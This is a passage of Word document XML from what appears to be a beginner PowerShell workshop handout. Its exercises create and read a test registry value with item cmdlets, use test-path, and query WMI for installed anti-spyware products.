        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Run new-item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65783875" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Run a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> again. See anything new?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9647DB" w14:textId="501ABEFD" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cd to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> key </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F6E15" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Create a new registry value. Assign this value the name of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>. To do this you will have to use cmdlet new-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C3EE715" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>In the registry get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>childitem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> will display any keys that are in the hive, but will not show any values that may fall under that key *We'll </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>clairify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> during discussion*. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433E71A" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Does the value </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> appear? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56357516" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Let’s set the value </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> to something. *hint the noun contains the word item.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F47C2EF" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Make sure you’re in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> key. cd there if not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199796A5" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">Set the value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> to 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E323571" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Type set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">path . -name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> -value 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32634E" w14:textId="3738EF85" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">*If you are unaware, the -path parameter is set to a period (.) The period in this syntax means my current folder or whatever value set-location is set too. In Linux this would be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">. If you did not cd to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> above your path would be something different. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304ADA83" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Extra "credit" Run get-help for set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>. The parameters used above are also positional. What would the command look like without any parameters (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>, set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> &lt;value&gt; &lt;value&gt; &lt;value&gt; ---&gt; I did not use any parameters here. This time set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> equal to 100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC0BB5" w14:textId="42ADA4AA" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">What cmdlet can I learn what the value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> is set too? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA14FE" w14:textId="4E172535" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="00DB1131" w:rsidP="006D4A11">
      <w:r>
        <w:t>Stage 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Test Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430F086" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>To make sure everything is there let’s play around with the test-path cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0ACFD" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Cd back to your c:\ drive. Type test-path c:\ What happened?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14E420" w14:textId="51E94871" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Test-path returned True (or it should have) – how could we use that in coding?  IF…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8055E0" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="00DB1131">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Run test-path on HKCU:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> (If is not equal to true speak up.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B3955" w14:textId="77777777" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="00DB1131">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Assign the run get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> on HKCU:\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>psclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>\ to a variable. Remember how?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C9DCBB" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>variablename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> = get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>itemproperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32194B04" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">How would you extract value </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>bsidesdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF22CA0" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t>Try it $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>variablename.test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> – what’s returned?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3A79D" w14:textId="01A6CB66" w:rsidR="006D4A11" w:rsidRPr="00A136B4" w:rsidRDefault="006D4A11" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve">If we did not give you the answer above, what cmdlet will tell us what property, methods, aliases, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A136B4">
        <w:t xml:space="preserve"> are available to us? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19027BBD" w14:textId="77777777" w:rsidR="00F4582F" w:rsidRPr="00F4582F" w:rsidRDefault="00F4582F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E35246D" w14:textId="39FD00F0" w:rsidR="008F7152" w:rsidRDefault="008F7152"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6 </w:t>
      </w:r>
      <w:r w:rsidR="003A0131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>&lt;insert number here&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C354C0" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B96F3A2" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152"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190D7C4C" w14:textId="77777777" w:rsidR="008F7152" w:rsidRPr="00CA4184" w:rsidRDefault="008F7152" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35663F8F" w14:textId="59047DB9" w:rsidR="008F7152" w:rsidRDefault="001B3B54" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To gain familiarity with WMI objects and how to interact with them.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F02E74" w14:textId="54869A01" w:rsidR="00FC3E6A" w:rsidRPr="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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WMI to query if you have</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> any anti-spyware products installed on your machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA12386" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DC8599" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE2816" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25547DE1" w14:textId="0D5A96BD" w:rsidR="008F7152" w:rsidRDefault="008F7152"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Query </w:t>
      </w:r>
      <w:r w:rsidR="001B3B54">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WMI to determine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>what antispyware produc</w:t>
      </w:r>
      <w:r w:rsidR="001B3B54">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ts are installed on your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352CE60" w14:textId="77777777" w:rsidR="001B3B54" w:rsidRDefault="001B3B5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7AC4140F" w14:textId="26898097" w:rsidR="001B3B54" w:rsidRDefault="001B3B5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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="744C19DF" w14:textId="77777777" w:rsidR="001B3B54" w:rsidRPr="001B3B54" w:rsidRDefault="001B3B54" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F09FDCF" w14:textId="77777777" w:rsidR="001B3B54" w:rsidRPr="005525A0" w:rsidRDefault="001B3B54" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356DE8D2" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54899016" w14:textId="4B0E8E23" w:rsidR="008F7152" w:rsidRPr="003A12DF" w:rsidRDefault="008F7152"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9419B6">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>5-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009419B6">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C6986FE" w14:textId="77777777" w:rsidR="008F7152" w:rsidRDefault="008F7152" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2089364C" w14:textId="4C4E98B0" w:rsidR="009419B6" w:rsidRPr="00622089" w:rsidRDefault="009419B6"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What’s available</w:t>
      </w:r>
      <w:r w:rsidR="008E6D16">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4D84D" w14:textId="78A05CBD" w:rsidR="009419B6" w:rsidRDefault="00C65969" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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First we need to be able to determine what is at our disposal with Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B12C0A9" w14:textId="177F3D3A" w:rsidR="00C65969"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmiobject</w:t>
      </w:r>
